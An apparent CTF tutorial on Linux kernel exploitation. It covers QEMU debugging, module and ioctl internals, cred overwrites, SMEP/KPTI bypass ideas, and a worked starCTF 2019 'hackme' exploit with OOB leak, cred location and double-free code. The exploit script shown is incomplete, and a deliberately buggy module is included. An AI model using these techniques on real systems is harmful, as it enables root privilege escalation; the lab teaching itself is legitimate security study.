Linux Kernel Exploitation Tutorial

Intro

There are too many Kernel challenge in recent CTFs. And I found myself difficult to keep up with my team’s pace. Thus I start my Linux kernel pwn journey.

Kernel exploitation is like remote code execution but happens in kernel space, allowing attackers to raise privilege from normal account to root. Luckily, we don’t have to understand Process Scheduling or some hardcore things like that. Libc pwning background is enough for understanding this post. The kernel also suffers from OOB, UAF, double free, and race condition, which are common for us. However, the exploitation and root cause is more difficult to understand.

In addition, the structure of kernel module and APIs are quite special from those from userspace. We will talk about them soon. This post is partial for CTF and partial for real world kernel, the latter part will be updated later.

Setup

I will use CTF challenge and some real world examples instead of compiling one. However, if you do have an interest in building from scratch, you can go to this repo.

Usually, we debug kernel on QEMU. The difference between QEMU and VMWare/Virtual Box is that QEMU is more low level. It also allows us to simulate different hardware like ARM and MIPS. We can use package manager to install it handy.

Load CTF Files to QEMU

Usually, the kernel challenge provides you a start.sh, something like this:

qemu-system-x86_64 \
    -m 256M \
    -enable-kvm \
    -nographic \
    -kernel bzImage \
    -append 'console=ttyS0 loglevel=3 oops=panic panic=1 kaslr' \
    -monitor /dev/null \
    -initrd init.cpio \
    -smp cores=4,threads=4 \
    -cpu kvm64,smep

Some core options:

  • qemu-system-x86_64: use x86_64 as architecture, we can also use arm or mips
  • -m: memory restriction
  • -enable-kvm: require KVM to accelerate, startup will fail in QEMU Mac or Qemu Windows.
  • -kernel bzImage: use bzImage as kernel image
  • -append: append addition arguments in startup, we enable kASLR protection here
  • -initrd init.cpio: use init.cpio as filesystem, a storage file, we might need to edit /bin/sh to startup as root user.
  • -cpu kvm64,smep: enable SMEP protection here.

If you want to debug the kernel via GDB, we need to append an additional argument:

-gdb tcp::6789 
# gdb remote in port 6789 
# -s is equaivalent to -gdb tcp::1234

To startup as root, we need to modify /init or /etc/init.d/rcS in init.cpio:

# decompress
mkdir fs
cd fs
cpio -idm < ../init.cpio

# edit /init
# or /etc/init.d/rcS
setsid /bin/cttyhack setuidgid 0 /bin/sh
# user: setsid /bin/cttyhack setuidgid 1000 /bin/sh

# zip again
find . -print0 | cpio --null -ov --format=newc > ../new.cpio

The bzImage is compressed, we need to use extract-vmlinux script to extract it to load symbols or gadgets, then load to gdb and remote debug:

$ ./extract-linux bzImage > kernel
$ gdb kernel -q
gdb> target remote localhost:6789 # connect to kernel

A Quick Snap

A kernel is huge, basically it has following components:

  • Process Management
  • Memory Management
  • File System
  • Device Control
  • Networking
  • and many many more…

However, we don’t have to take care of all the components. Staring at the user-kernel interaction part is also enough to find a bug. Even though we eliminate some redundant part, there are still large numbers of attack surfaces (drivers, ioctl, /proc, different protocols implementation, virtualization)

I choose two most wide known attack surface - /proc file system and ioctl function. They are more friendly to beginners. Also, we can apply the exploitation to different attack surfaces. By understanding them, you can investigate harder part yourself.

The kernel space and userspace APIs are quite different, we will introduce them later.

Kernel Module

Kernel module is binary that can be loaded or unloaded by Linux kernel. Drivers (those manipulated by ioctl) and /proc, for example, are kernel modules. Here are some basic operations on kernel module:

lsmod # show currently loaded modules
modinfo name # show modules info
insmod name # install a module
rmmod name # remove a module

Usually, a CTF challenge will provide you XXX.ko. That is a kernel module and you need to install them manually through insmod

To write a kernel module, we need to follow specific form to register our utility functions. Also, the functions we called will be quite different from those from userspace:

#include <linux/module.h>	
#include <linux/kernel.h>
#include <linux/init.h>	
static int __init test_module_init(void)
{
	printk(KERN_INFO "Init\n");
	return 0;
}

static void __exit test_module_exit(void)
{
	printk(KERN_INFO "Quit\n");
}

module_init(test_module_init);
module_exit(test_module_exit);

We use C macro __init and __exit to mark them as init and exit functions. Also, we need to register them via module_init and module_exit. It will output Init and Quit when initialize and exit.

You probably find that we use printk instead of printf here. That’s because printf is a userspace function, and userspace cannot interfere kernel space. Therefore we choose printk as alternative one. There are lots of substitutions, we will talk about them later.

Now, you have a roughly understand on kernel module. Don’t find main in a module binary. If you want to know more about basic kernel programming, go to here.

proc

Proc filesystem is a special file system that demonstrate system information. It actually retrieves information from kernel, and then output to the userspace via file descriptor. When writing buffer to a proc file, a kernel module actually called somethings like read and process the input.

An example from kernel_exploit_world:

#include <linux/kernel.h>
#include <linux/module.h>
#include <linux/proc_fs.h>
#include <linux/string.h>
#include <linux/vmalloc.h>
#include <linux/sched.h>
#include <linux/uaccess.h>

struct proc_dir_entry *proc_file_entry;
uint64_t rbx, rbp;
// Buggy write handling
int buggy_write(struct file *file,
        const char *buf,
        unsigned long len) {

    char data[8];
    copy_from_user(data, buf, len);
    printk(" buggy_write %s data=(%p) len=%d\n", buf,(void*)data, len);
    return len;
}

static struct file_operations buggy_proc_fops = {
  .write = buggy_write,
};

int init_module()
{
    printk(" module started\n");
    printk(" creating proc entry @ /proc/buggy\n");

    // handle anything written to /proc/buggy
    // pass it to buggy_write
    proc_file_entry = proc_create("buggy", 0666, NULL, &buggy_proc_fops);

    return 0;
}

void cleanup_module()
{
    remove_proc_entry("buggy", NULL);
}

The module implements a buggy_write. When user writes more than 8 bytes, OOB will happen. The exploitation part will be explained later. Let’s have a glance on /proc module first.

At the beginning, we use proc_create to initialize customize proc. We register buggy_write as write function. If we want to read from a proc, we can implement .read. Despite printk, we use another new kernel function copy_from_user here. This is a kernel space memcpy that allows us to interact with userspace. memcpy can only be used in operating two kernel space memory. If we want to copy a buffer to userspace instead, we need to call copy_to_user.

For heap management, we need to use kmalloc and kfree as replacement.

ioctl

ioctl provides an interface for users to interact with device. User can thus indirectly manipulate or corrupt kernel space. Let’s see an ioctl sample from how2kernel, I delete partial code to make it more compact:

#include <linux/kernel.h>
#include <linux/module.h>	/* Specifically, a module */
#include <linux/fs.h>
#include <asm/uaccess.h>	/* for get_user and put_user */

#include "ioctl.h"
#define SUCCESS 0
#define DEVICE_NAME "char_dev"
#define BUF_LEN 80

/* 
 * Is the device open right now? Used to prevent
 * concurent access into the same device 
 */
static int Device_Open = 0;

/* 
 * The message the device will give when asked 
 */
static char Message[BUF_LEN];

/* 
 * How far did the process reading the message get?
 * Useful if the message is larger than the size of the
 * buffer we get to fill in device_read. 
 */
static char *Message_Ptr;

/* 
 * This is called whenever a process attempts to open the device file 
 */
static int device_open(struct inode *inode, struct file *file)
{

  /* 
   * We don't want to talk to two processes at the same time 
   */
  if (Device_Open)
    return -EBUSY;

  Device_Open++;
  /*
   * Initialize the message 
   */
  Message_Ptr = Message;
  try_module_get(THIS_MODULE);
  return SUCCESS;
}

static int device_release(struct inode *inode, struct file *file)
{

  /* 
   * We're now ready for our next caller 
   */
  Device_Open--;

  module_put(THIS_MODULE);
  return SUCCESS;
}

/* 
 * This function is called whenever a process which has already opened the
 * device file attempts to read from it.
 */
static ssize_t device_read(struct file *file,	/* see include/linux/fs.h   */
			   char __user * buffer,	/* buffer to be
							 * filled with data */
			   size_t length,	/* length of the buffer     */
			   loff_t * offset)
{
  /* 
   * Number of bytes actually written to the buffer 
   */
  int bytes_read = 0;

  /* 
   * If we're at the end of the message, return 0
   * (which signifies end of file) 
   */
  if (*Message_Ptr == 0)
    return 0;

  /* 
   * Actually put the data into the buffer 
   */
  while (length && *Message_Ptr) {

    /* 
     * Because the buffer is in the user data segment,
     * not the kernel data segment, assignment wouldn't
     * work. Instead, we have to use put_user which
     * copies data from the kernel data segment to the
     * user data segment. 
     */
    put_user(*(Message_Ptr++), buffer++);
    length--;
    bytes_read++;
  }

  /* 
   * Read functions are supposed to return the number
   * of bytes actually inserted into the buffer 
   */
  return bytes_read;
}

/* 
 * This function is called when somebody tries to
 * write into our device file. 
 */
static ssize_t
device_write(struct file *file,
	     const char __user * buffer, size_t length, loff_t * offset)
{
	int i;

	for (i = 0; i < length && i < BUF_LEN; i++)
		get_user(Message[i], buffer + i);

	Message_Ptr = Message;

	/* 
	 * Again, return the number of input characters used 
	 */
	return i;
}

long device_ioctl(struct file *file,
                  unsigned int ioctl_num,	/* number and param for ioctl */
                  unsigned long ioctl_param)
{
	int i;
	char *temp;
	char ch;

	/* 
	 * Switch according to the ioctl called
	 */
	switch (ioctl_num) {
	case IOCTL_SET_MSG:
		/* 
		 * Receive a pointer to a message (in user space) and set that
		 * to be the device's message.  Get the parameter given to 
		 * ioctl by the process. 
		 */
		temp = (char *)ioctl_param;

		/* 
		 * Find the length of the message 
		 */
		get_user(ch, temp);
		for (i = 0; ch && i < BUF_LEN; i++, temp++)
			get_user(ch, temp);

		device_write(file, (char *)ioctl_param, i, 0);
		break;

	case IOCTL_GET_MSG:
		/* 
		 * Give the current message to the calling process - 
		 * the parameter we got is a pointer, fill it. 
		 */
		i = device_read(file, (char *)ioctl_param, 99, 0);

		/* 
		 * Put a zero at the end of the buffer, so it will be 
		 * properly terminated 
		 */
		put_user('\0', (char *)ioctl_param + i);
		break;

	case IOCTL_GET_NTH_BYTE:
		/* 
		 * This ioctl is both input (ioctl_param) and 
		 * output (the return value of this function) 
		 */
		return Message[ioctl_param];
		break;
	}

	return SUCCESS;
}

/* 
 * This structure will hold the functions to be called
 * when a process does something to the device we
 * created. Since a pointer to this structure is kept in
 * the devices table, it can't be local to
 * init_module. NULL is for unimplemented functions. 
 */
struct file_operations Fops = {
	.read = device_read,
	.write = device_write,
	.unlocked_ioctl = device_ioctl,
	.open = device_open,
	.release = device_release,	/* a.k.a. close */
};

/* 
 * Initialize the module - Register the character device 
 */
int init_module()
{
	int ret_val;
	/* 
	 * Register the character device (atleast try) 
	 */
	ret_val = register_chrdev(MAJOR_NUM, DEVICE_NAME, &Fops);

	/* 
	 * Negative values signify an error 
	 */
	if (ret_val < 0) {
		printk(KERN_ALERT "%s failed with %d\n",
		       "Sorry, registering the character device ", ret_val);
		return ret_val;
	}

	return 0;
}

void cleanup_module()
{
  unregister_chrdev(MAJOR_NUM, DEVICE_NAME);
}

Basically, it stimulates operating a device. An additional operation unlocked_ioctl is implemented and provided to userspace.

We can use ioctl to manipulate the device, for example:

#include "ioctl.h"

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>		/* open */
#include <unistd.h>		/* exit */
#include <sys/ioctl.h>		/* ioctl */

void
ioctl_set_msg(int file_desc, char *message)
{
  int ret_val;

  ret_val = ioctl(file_desc, IOCTL_SET_MSG, message);

  if (ret_val < 0) {
    printf("ioctl_set_msg failed:%d\n", ret_val);
    exit(-1);
  }
}

void
ioctl_get_msg(int file_desc)
{
  int ret_val;
  char message[100];

  ret_val = ioctl(file_desc, IOCTL_GET_MSG, message);

  if (ret_val < 0) {
    printf("ioctl_get_msg failed:%d\n", ret_val);
    exit(-1);
  }

  printf("get_msg message:  %s\n", message);
}

void
ioctl_get_nth_byte(int file_desc)
{
  int i;
  char c;

  printf("get_nth_byte message: ");

  i = 0;
  do {
    c = ioctl(file_desc, IOCTL_GET_NTH_BYTE, i++);

    if (c < 0) {
      printf
        ("ioctl_get_nth_byte failed at the %d'th byte:\n",
         i);
      exit(-1);
    }

    putchar(c);
  } while (c != 0);
  putchar('\n');
}

int
main()
{
  int file_desc;
  char *msg = "Message passed by ioctl\n";

  file_desc = open(DEVICE_FILE_NAME, 0);
  if (file_desc < 0) {
    printf("Can't open device file: %s\n", DEVICE_FILE_NAME);
    exit(-1);
  }

  ioctl_get_nth_byte(file_desc);
  ioctl_get_msg(file_desc);
  ioctl_set_msg(file_desc, msg);

  close(file_desc);
}

Context Switching

Since userspace and kernel space are in different memory segment with different permission, we need some instructions to switch the spaces.

To switch from userspace to kernel space, we need to user syscall. You can treat it as a kernel version call.

Switching back to userspace is quite different. Usually, we need to execute these two instructions:

swapgs
iretq

swapgs exchanges the current GS base register value with the value contained in MSR address, which store references to kernel data structure.

ireq takes us to userspace. Despite RIP pointer address, we have to store addition four registers: CS, EFLAGS, RSP, SS, and the stack look like this:

|---------|
| RIP     | -> instruction address
|---------|
| CS      | -> code segments
|---------|
| EFLAGS  | -> flags for system status
|---------|
| RSP     | -> stack pointer
|---------|
| SS      | -> stack segment
|---------|

From a kernel exploiter’s perspective, we usually set RIP to a function that derives shell, and RSP to a mmap region for stack pivot. A helper function can also help us:

size_t user_cs, user_ss, user_rflags, user_sp;
void save_status()
{
    __asm__("mov user_cs, cs;"
            "mov user_ss, ss;"
            "mov user_sp, rsp;"
            "pushf;"
            "pop user_rflags;"
            );
}

Privilege Transfer

If we can manipulate kernel control flow, what should we do? How can we utilize kernel permission? The answer is changing current process privilege in kernel space.

There is a struct task_struct storing process data. And the current process is referenced by pointer current. We can use cred in current pointer, which controls euid field. Change the current->cred->euid to 0, the current process is marked to have root privilege:

struct thread_info {
	struct task_struct	*task;	/* main task structure */
	__u32			flags;		/* low level flags */
	__u32			status;		/* thread synchronous flags */
	__u32			cpu;		/* current CPU */
	mm_segment_t		addr_limit;
	unsigned int		sig_on_uaccess_error:1;
	unsigned int		uaccess_err:1;	/* uaccess failed */
};

struct task_struct {
	volatile long state; /* -1 unrunnable, 0 runnable, >0 stopped*/
	void *stack;
	atomic_t usage;
	unsigned int flags;	/* per process flags, defined below */
	unsigned int ptrace;
	...
	/* process credentials */
	const struct cred __rcu *ptracer_cred; /* Tracer's credentials at attach */
	const struct cred __rcu *real_cred; /* objective and real 
	subjective task credentials (COW) */
	const struct cred __rcu *cred;	/* effective (overridable) 
	subjective task credentials (COW) */
	char comm[TASK_COMM_LEN]; /* executable name excluding path
				     - access with [gs]et_task_comm (which lock
				       it with task_lock())
				     - initialized normally by setup_new_exec */
/* file system info */
	struct nameidata *nameidata;
#ifdef CONFIG_SYSVIPC
/* ipc stuff */
	struct sysv_sem sysvsem;
	struct sysv_shm sysvshm;
#endif
};

struct cred {
	atomic_t	usage;
#ifdef CONFIG_DEBUG_CREDENTIALS
	atomic_t	subscribers;	/* number of processes subscribed */
	void		*put_addr;
	unsigned	magic;
#define CRED_MAGIC	0x43736564
#define CRED_MAGIC_DEAD	0x44656144
#endif
	kuid_t		uid;		/* real UID of the task */
	kgid_t		gid;		/* real GID of the task */
	kuid_t		suid;		/* saved UID of the task */
	kgid_t		sgid;		/* saved GID of the task */
	kuid_t		euid;		/* effective UID of the task */
	kgid_t		egid;		/* effective GID of the task */
	kuid_t		fsuid;		/* UID for VFS ops */
	kgid_t		fsgid;		/* GID for VFS ops */
	unsigned	securebits;	/* SUID-less security management */
	kernel_cap_t	cap_inheritable; /* caps our children can inherit */
	kernel_cap_t	cap_permitted;	/* caps we're permitted */
	kernel_cap_t	cap_effective;	/* caps we can actually use */
	kernel_cap_t	cap_bset;	/* capability bounding set */
	kernel_cap_t	cap_ambient;	/* Ambient capability set */
#ifdef CONFIG_KEYS
	unsigned char	jit_keyring;	/* default keyring to attach requested
					 * keys to */
	struct key __rcu *session_keyring; /* keyring inherited over fork */
	struct key	*process_keyring; /* keyring private to this process */
	struct key	*thread_keyring; /* keyring private to this thread */
	struct key	*request_key_auth; /* assumed request_key authority */
#endif
#ifdef CONFIG_SECURITY
	void		*security;	/* subjective LSM security */
#endif
	struct user_struct *user;	/* real user ID subscription */
	struct user_namespace *user_ns; /* user_ns the caps and keyrings are relative to. */
	struct group_info *group_info;	/* supplementary groups for euid/fsgid */
	struct rcu_head	rcu;		/* RCU deletion hook */
};

We don’t need to calculate current->cred->euid manually (however, sometimes you might need to brute-force it), commit_cred and prepare_kernel_cred can handle that easily. We can actually describe it in one line code:

commit_creds(prepare_kernel_cred(0));

Spawning a shell in kernel or reading root file are not allowed, we have to return to userspace process for any post-exploit works.

This sounds quite easy, but out payload actually needs to bypass some modern mitigations, which will be introduced later. After all, this is the key idea of kernel payload.

Kernel Mitigation

Despite limitation on kernel space APIs, another characteristic of kernel exploitation is exploit mitigation. We will review some mitigations both in userspace and kernel space, subsequently introduce kernel-only mitigation.

Common Mitigations

  • N^X: Stack is not executable, we need to write ROP chains.
  • Stack Canary: Overflow protection, we have to leak canary to hijack control flow.
  • ASLR: randomize address, but the kernel version is called kASLR.

Kernel Address Display Restriction

In older version, there is a /proc/kallsyms, which shows all addresses and symbols in Linux kernel. We can retrieve information by read it handily. However, the default value of /proc/sys/kernel/kptr_restrict will be set to 1 to prevent leak.

SMAP/SMEP

A.k.a Supervisor Mode Access Prevention and Supervisor Mode Execution Prevention. Also known as PXN and PAN in ARM.

When you type vmmap in your gdb, there are two special memory segment vdso and vsyscall. (Virtual Dynamic Shared Object and Virtual System Call, the previous one uses shared object to map memory pages into different process). The two special regions are introduced to accelerate Linux execution speed. If a system call is used frequently, it will be cached in these regions, allowing reductions in switching kernel space and userspace. We can cache malicious code through userspace process and eventually let the kernel executing it.

SMAP/SMEP prevent kernel from reading userspace content and executing them. We can check via:

cat /proc/cpuinfo | grep smap # or smep

Address Protection

This bans kernel using memory address starting from 0. The reason is quite simple, the NULL pointer dereference will also try to read address 0.

We can check the minimum address by cat /proc/sys/vm/mmap_min_addr.

KPTI

Kernel page-table isolation. When executing userspace program, Linux will keep kernel memory mapped in page tables, which improves the performance. The tables are protected unless system call or interruption occurs. The famous Meltdown vulnerability can utilize the table to leak kernel data. If the KPTI is applied, the page table won’t exist anymore.

However, this technique has a relative high resource consumption, some compiled kernels might disable it.

To find if it is enabled, use:

dmesg -wH | grep 'Kernel/User page tables isolation'

Mitigation Bypass

Before debugging and writing our own exploitation, let’s review how to bypass above mitigations.

ret2user

Condition: Disabled SMEP

Ret2User is like kernel version of ret2libc. It can only be used when SMEP is disabled. It utilized a feature that userspace cannot execute kernel space code, but kernel space can execute userspace code (when SMEP is disabled). Thus, we can mmap a region in userspace for commit_creds(prepare_kernel_cred(0)) shellcode. And then start executing the region.

SMEP Bypass

When SMEP is enabled, the 20th bit of CR4 register will be 1. (And the 21th bit of CR4 will be 1 if SMAP is enabled). We can use ROP to disable it:

pop r??
mov cr4, r??

To do kROP, we need to search gadgets in vmlinux, which can be extracted by extract-vmlinux

The magic value 0x6f0 is useful for debug purpose: mov cr4, 0x6f0. We can also chain a ROP to execute commit_creds(prepare_kernel_cred(0)).

Address Display Protection Bypass

Unfortunately, we have to leak kernel address, and then repeat above methods to get shell.

Some Other Tips

Unlike traditional pwn, kernel is more likely to suffer from race condition. For example, user can open a device twice. And the device file might implement incorrect device_close.

Double fetch is a classical race condition that user can use threads to edit data after kernel accessed it. Similar issues in traditional pwn is more explicit than kernel challenge. You can probably guess there is a race condition when threads are used in a challenge.

Also, despite changing cred struct to escape privilege, we can edit tty_struct->tty_operations. Then we manipulate function pointer to arbitrary jump(e.g. tty_struct->tty_operations->write). Finally use a few gadgets to pivot stack to ROP.

Exploitation

We will use starCTF 2019 hackme challenge as a sample.

Modify the /etc/init.d/rcS and add gdb remote debug option in startvm.sh as mentioned above. When you startup with a root shell, your debug environment is successfully deployed.

Reverse the Module

Let’s reverse the binary first:

signed __int64 __fastcall hackme_ioctl(__int64 fd, unsigned int _opt, __int64 _arg)
{
  __int64 v4; // rsi
  __int64 *_store_loc; // rbx
  signed __int64 _dest; // rbx MAPDST
  __int64 _ptr; // rdi MAPDST
  __int64 *_ptr_dest; // rbx MAPDST
  __int64 _kernel_ptr; // rax
  unsigned int idx; // [rsp+0h] [rbp-38h]
  __int64 user_ptr; // [rsp+8h] [rbp-30h] MAPDST
  __int64 size; // [rsp+10h] [rbp-28h] MAPDST
  __int64 offset; // [rsp+18h] [rbp-20h]

  v4 = _arg;
  copy_from_user(&idx, _arg, 0x20LL);
  if ( _opt == 0x30001 )                        // free
  {
    _dest = 2LL * idx;
    _ptr = pool[_dest];
    _ptr_dest = &pool[_dest];
    if ( _ptr )
    {
      kfree(_ptr, v4);
      *_ptr_dest = 0LL;
      return 0LL;
    }
    return -1LL;
  }
  if ( _opt > 0x30001 )
  {
    if ( _opt == 0x30002 )
    {
      _dest = 2LL * idx;
      _ptr = pool[_dest];
      _ptr_dest = &pool[_dest];
      if ( _ptr && offset + size <= (unsigned __int64)_ptr_dest[1] )
      {
        copy_from_user(offset + _ptr, user_ptr, size);
        return 0LL;
      }
    }
    else if ( _opt == 0x30003 )
    {
      _dest = 2LL * idx;
      _ptr = pool[_dest];
      _ptr_dest = &pool[_dest];
      if ( _ptr )
      {
        if ( offset + size <= (unsigned __int64)_ptr_dest[1] )
        {
          copy_to_user(user_ptr, offset + _ptr, size);
          return 0LL;
        }
      }
    }
    return -1LL;
  }
  if ( _opt != 0x30000 )
    return -1LL;
  _store_loc = &pool[2 * idx];
  if ( *_store_loc )
    return -1LL;
  _kernel_ptr = _kmalloc(size, 0x6000C0LL);
  if ( !_kernel_ptr )
    return -1LL;
  *_store_loc = _kernel_ptr;
  copy_from_user(_kernel_ptr, user_ptr, size);
  _store_loc[1] = size;
  return 0LL;
}

This is another heap challenge, but in the kernel. The variable without _ prefix is provided from userspace. To be short, it implements a ioctl that can new, read, and write. We can notice that:

if ( _ptr && offset + size <= (unsigned __int64)_ptr_dest[1] )
{
copy_from_user(offset + _ptr, user_ptr, size);
return 0LL;
}

The comparison operator is <= rather than < here. So we have a one byte overflow vulnerability. Also, the offset we provided is not unsigned, we have an OOB. Since kernel heap is similar to fastbin, just follow the traditional heap stuff, leaking kernel address and overwrite fd to edit cred, we can eventually get shell.

Preparing PoC

We can write a minimal template first:

#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <memory.h>
#include <string.h>
#include <assert.h>

int fd;
struct UserArg {
  unsigned int idx;
  char *user_ptr;
  size_t size;
  size_t offset;
} arg;

#define BUF_SIZE 0x100000L

char buf[BUF_SIZE] = {0};

void init() {
  fd = open("/dev/hackme", 0);
  if (fd < 0)
    exit(-1);

  arg.user_ptr = buf;
}

void kmalloc(unsigned int idx, char ch, size_t size) {
  memset(buf, ch, sizeof(buf)); 
  arg.idx = idx;
  arg.size = size;
  int res = ioctl(fd, 0x30000, &arg);
  assert(res >= 0);
}

void kfree(unsigned int idx) {
  arg.idx = idx;
  int res = ioctl(fd, 0x30001, &arg);
  assert(res >= 0);
}

void kwrite(unsigned int idx, size_t size, size_t offset) {
  arg.idx = idx;
  arg.size = size;
  arg.offset = offset;
  int res = ioctl(fd, 0x30002, &arg);
  assert(res >= 0);
}

void kread(unsigned int idx, size_t size, size_t offset) {
  arg.idx = idx;
  arg.size = size;
  arg.offset = offset;
  int res = ioctl(fd, 0x30003, &arg);
  assert(res >= 0);
}

void printhex(char* pbuf, size_t size)
{
	unsigned char* buf = (unsigned char*)pbuf;
	for (size_t i = 0; i < size; ++i)
	{
		printf("%.2x", buf[i]);
	}
	printf("\n");
}

Then, you need to append main function in the button of the script:

int main() {
  printf("Running Exploitation...\n");
  init();

  for(int i = 0; i < 10; i++)
    kmalloc(i, i + 'A', 0x100);

}

We define our /dev/hackme file descriptor in fd. Then, we add several functions simulating kernel ioctl. We need to static compile the program and pack the ELF into cpio:

gcc exp.c --static -o exp
# where you unarchive the orignal cpio
cd fs
cp ../exp .
# You also need to modify cpio file in startvm.sh
find . -print0 | cpio --null -ov --format=newc > ../new.cpio

Attach your debugger to kernel, let’s find where we need to break:

/home/pwn # cat /proc/kallsyms | grep hack
ffffffff97e5d000 D __vvar_beginning_hack
ffffffffc010f000 t hackme_ioctl	[hackme]
ffffffffc0111000 d misc	[hackme]
ffffffffc0111060 d fops	[hackme]
ffffffffc0110068 r _note_6	[hackme]
ffffffffc0111400 b pool	[hackme]
ffffffffc0111180 d __this_module	[hackme]
ffffffffc010f190 t cleanup_module	[hackme]
ffffffffc010f170 t init_module	[hackme]
ffffffffc010f190 t hackme_exit	[hackme]
ffffffffc010f170 t hackme_init	[hackme]

The hacme_ioctl is at 0xffffffffc010f000, so b *0xffffffffc010f000. When the execute our exp file, the breakpoint will be triggered:

Thread 1 hit Breakpoint 2, 0xffffffffc010f000 in ?? ()

Use this address, we can break kmalloc and kfree via calculating offset. And we can inspect kernel heap:

gef➤  b *0xffffffffc010f000+0x0143
Breakpoint 3 at 0xffffffffc010f143
gef➤  b *0xffffffffc010f000+0x0122
Breakpoint 4 at 0xffffffffc010f122

...

Thread 1 hit Breakpoint 3, 0xffffffffc010f143 in ?? ()

Step execution several and record the returned malloc pointer times. After copy_from_user being executed, we can find that:

gef➤  x/10gx  0xffff967a0013d6c0
0xffff967a0013d6c0:	0x4242424242424242	0x4242424242424242

Okay, out function is executed correctly.

Leak Primitive

We have finish leak primitive now. To edit cred, its address need to be leaked first. While the previous chunks are used by kernel, let’s try to find kernel pointer by reading memory location before our first chunk:

gef➤  x/20gx 0xffffa4464017b400-0x200
0xffffa4464017b200:	0xffffffffb60472c0	0x0000000100000000
0xffffa4464017b210:	0x0000000000000001	0x0000000000000000
0xffffa4464017b220:	0xffffffffb6047240	0xffffffffb6049ae0
0xffffa4464017b230:	0xffffffffb6049ae0	0xffffa44640015100
0xffffa4464017b240:	0xffffa4464017b250	0x0000000000000000
0xffffa4464017b250:	0xffffa446400213d1	0x0000000000000000
0xffffa4464017b260:	0xffffa4464017b270	0xffffa4464017b200
0xffffa4464017b270:	0xffffa4464017b250	0x0000000000000000
0xffffa4464017b280:	0x0000000000000000	0xffffa4464017b200
0xffffa4464017b290:	0xffffa4464001c258	0x0000000000000000

/home/pwn # cat /proc/kallsyms  | grep ffffffffb60472c0
ffffffffb60472c0 d uts_kern_table

Interesting, let’s verify if it is stable (I only edit main function):

int main() {
  printf("Running Exploitation...\n");
  init();

  for(int i = 0; i < 10; i++)
    kmalloc(i, i + 'A', 0x100);

  kread(0, 0x200, -0x200);
  printhex(buf, 8);
}

Run it (some format issues it printhex function…just ignore it):

/home/pwn # /exp
Running Exploitation...
c07244a0ffffffff
/home/pwn # cat /proc/kallsyms | grep uts_kern_table
ffffffffa04472c0 d uts_kern_table

Despite use negative OOB to read previous chunks, we can also inspect free chunks to find leak heap address by luck.

Locating cred

Now, we have to find cred. A magical method is using prctl + Heap Fengshui. To be more precise, prctl will store a customized string and current cred in heap. By scanning the string via negative read, we can also leak the address of cred:

char scan[] = "TestTestTest";

int main() {
  printf("Running Exploitation...\n");
  
  uintptr_t cred;
  prctl(PR_SET_NAME, scan);

  init();
  for(int i = 0; i < 64; i++) {
    kmalloc(i, 'A' + i, 0x40);
  }
  
  printf("Leaking Base Adress\n");
  kread(63, BUF_SIZE, -BUF_SIZE);
  char* ret = (char*) memmem(buf, sizeof(buf), scan, sizeof(scan) - 1);
  if (ret) {
    cred = *(uintptr_t*)(ret - 8);
    assert(*(uintptr_t*)(ret - 0x10) == cred);
    printf("%p %p\n", (void*)(ret - buf), (void*)cred);
    puts(ret);
  }

  kfree(10);
}

We first read a large section in the memory. If we match scan string, we read the previous two pointer and verify their consistence. Breaking the kfree in the kernel module to verify our assumption:

/home/pwn # /exp
Running Exploitation...
Leaking Base Adress
0xdefc8 0xffff9c6600025a00

gef➤  x/10gx  0xffff9c6600025a00
0xffff9c6600025a00:	0x0000000000000003	0x0000000000000000
0xffff9c6600025a10:	0x0000000000000000	0x0000000000000000
0xffff9c6600025a20:	0x0000000000000000	0x0000000000000000
0xffff9c6600025a30:	0x0000003fffffffff	0x0000003fffffffff
0xffff9c6600025a40:	0x0000003fffffffff	0x0000000000000000

The system is started as root. So many zero indicate that UID, GID stuff should be correct.

Arbitrary Write

The attack is similar to fastbin attack, but we cannot leave arbitrary pointer in fastbin list which will eventually lead to kernel panic. We have to allocate to a memory region where fd is 0. A quick PoC for double free:

int main() {
  printf("Running Exploitation...\n");
  
  uintptr_t cred;
  prctl(PR_SET_NAME, scan);

  init();
  kmalloc(0, 0x80, 'A');
  kmalloc(1, 0x80, 'B');
  kfree(0);
  memset(buf, 'A', 0x80);
  kwrite(1, 0x80, -0x80);
  kmalloc(3, 0x80, 'C');
  kmalloc(4, 0x80, 'D');
}

And get following result:

Running Exploitation...
[    7.317746] general protection fault: 0000 [#1] NOPTI
[    7.320050] CPU: 0 PID: 27 Comm: TestTestTest Tainted: G           O      4.20.13 #10
[    7.322743] RIP: 0010:__kmalloc+0x68/0x110
...
[    7.336034] RBP: ffffa123c0097dc8 R08: 4141414141414141 R09: 0000000000000000

Kernel panic with some A in the memory, that should be our fd payload. You might notice that we choose 0x80 instead of 0x40. That’s because there are too many 0x40 chunks in fastbin list. And they may not be adjacent to each other. Chunk 0x80 are easier for writeup. Once 0x40 size chunks are chosen to overwrite, the heap address need to be calculate write offset. Use negative read to leak fd using the same trick in finding cred, we can get heap address handy.

Final Script

Combine all together with comments:

#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <sys/wait.h>
#include <sys/prctl.h>
#include <memory.h>
#include <string.h>
#include <assert.h>

// hack_me file descriptor
int fd;

// User Arguments
struct UserArg {
  unsigned int idx;
  char *user_ptr;
  size_t size;
  size_t offset;
} arg;

#define BUF_SIZE 0x100000L

char buf[BUF_SIZE] = {0};

// Initialize the progarm
void init() {
  fd = open("/dev/hackme", 0);
  if (fd < 0)
    exit(-1);

  arg.user_ptr = buf;
}

void kmalloc(unsigned int idx, char ch, size_t size) {
  memset(buf, ch, sizeof(buf)); 
  arg.idx = idx;
  arg.size = size;
  int res = ioctl(fd, 0x30000, &arg);
  assert(res >= 0);
}

void kfree(unsigned int idx) {
  arg.idx = idx;
  int res = ioctl(fd, 0x30001, &arg);
  assert(res >= 0);
}

void kwrite(unsigned int idx, size_t size, size_t offset) {
  arg.idx = idx;
  arg.size = size;
  arg.offset = offset;
  int res = ioctl(fd, 0x30002, &arg);
  assert(res >= 0);
}

void kread(unsigned int idx, size_t size, size_t offset) {
  arg.idx = idx;
  arg.size = size;
  arg.offset = offset;
  int res = ioctl(fd, 0x30003, &arg);
  assert(res >= 0);
}

void printhex(char* pbuf, size_t size)
{
  unsigned char* buf = (unsigned char*)pbuf;
  for (size_t i = 0; i < size; ++i) {
    printf("%.2x", buf[i]);
  }
	
  printf("\n");
}

